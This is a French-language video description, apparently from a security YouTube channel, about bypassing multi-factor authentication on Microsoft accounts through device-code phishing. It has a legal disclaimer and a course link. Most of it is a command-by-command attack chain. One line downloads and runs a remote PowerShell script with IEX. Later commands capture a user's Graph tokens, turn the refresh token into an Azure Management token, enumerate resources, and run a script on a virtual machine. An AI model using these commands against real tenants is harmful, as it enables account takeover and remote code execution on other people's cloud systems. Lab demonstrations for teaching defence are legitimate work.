[Processus Thief] COMMENT LES HACKERS CONTOURNENT LA DOUBLE AUTHENTIFICATION
Vidéo en français sur le contournement de double authentification via l'authentification par Device Code sur un compte Microsoft.
Les démonstrations ont été réalisés sur un environnement Azure m'appartenant et dédié à cet effet.
Attention, le piratage est un délit.L'ensemble des démonstrations inclues dans cette vidéo ont été effectuées dans un laboratoire dédiée à cet usage. Cette vidéo n'a pas vocation à encourager le hacking en dehors d'un cadre légal.Le lien des formations d'Hamza @zer0bullshit :
https://www.hexadream.io/bootcamps-cybersecurite Pour obtenir le token Graph API de l'utilisateur :
IEX (iwr '
https://raw.githubusercontent.com/dafthack/GraphRunner/main/GraphRunner.ps1)
Get-GraphTokens -Device AndroidMobile -Browser Android
Pour convertir le token Graph API en token Azure Management :
git clone
https://github.com/f-bader/TokenTacticsV2cd TokenTacticsV2
Import-Module .\TokenTactics.psm1
$refreshtoken = $tokens.refresh_token
Invoke-RefreshToAzureManagementToken -Domain nicrosoft.fr -RefreshToken $refreshtoken -Device AndroidMobile
Get-UserObjectID -Token $tokens -upn "youtube@nicrosoft.fr"
Connect-AzAccount -AccessToken $AzureManagementToken.access_token -AccountId "YOUR ACCOUNT ID"
Pour lister les ressources :
Get-AzResource
Get-AzVM
Pour exécuter une commande sur la VM :
notepad C:\Users\Utilisateur\TokenTacticsV2\youtube.ps1
Invoke-AzVMRunCommand -ResourceGroupName AZUREDEMO.TECH -Name RDP-01 -CommandId 'RunPowerShellScript' -ScriptPath C:\Users\Utilisateur\TokenTacticsV2\youtube.ps1